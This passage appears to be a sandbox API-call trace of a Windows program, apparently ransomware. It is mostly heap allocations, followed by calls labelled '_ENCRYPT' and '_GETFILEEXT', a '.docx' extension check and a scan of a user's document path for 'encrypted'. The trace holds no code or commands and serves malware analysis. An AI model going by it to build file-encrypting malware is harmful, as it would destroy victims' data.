lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.956] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.957] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.958] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.959] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.959] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0036.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c8f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.960] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.960] CloseHandle (hObject=0x140) returned 1 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.960] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.961] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.961] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.961] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.961] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.961] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.961] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.961] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.961] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.961] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.962] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb456a080, ftCreationTime.dwHighDateTime=0x1d568d0, ftLastAccessTime.dwLowDateTime=0x6ef70c0, ftLastAccessTime.dwHighDateTime=0x1d5a02f, ftLastWriteTime.dwLowDateTime=0x6ef70c0, ftLastWriteTime.dwHighDateTime=0x1d5a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1550b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="zldtrs1nh.docx", cAlternateFileName="ZLDTRS~1.DOC")) returned 0x7c20c0 [0036.962] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.962] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.962] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb456a080, ftCreationTime.dwHighDateTime=0x1d568d0, ftLastAccessTime.dwLowDateTime=0x6ef70c0, ftLastAccessTime.dwHighDateTime=0x1d5a02f, ftLastWriteTime.dwLowDateTime=0x6ef70c0, ftLastWriteTime.dwHighDateTime=0x1d5a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1550b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="zldtrs1nh.docx", cAlternateFileName="ZLDTRS~1.DOC")) returned 0x7c20c0 [0036.962] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.962] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 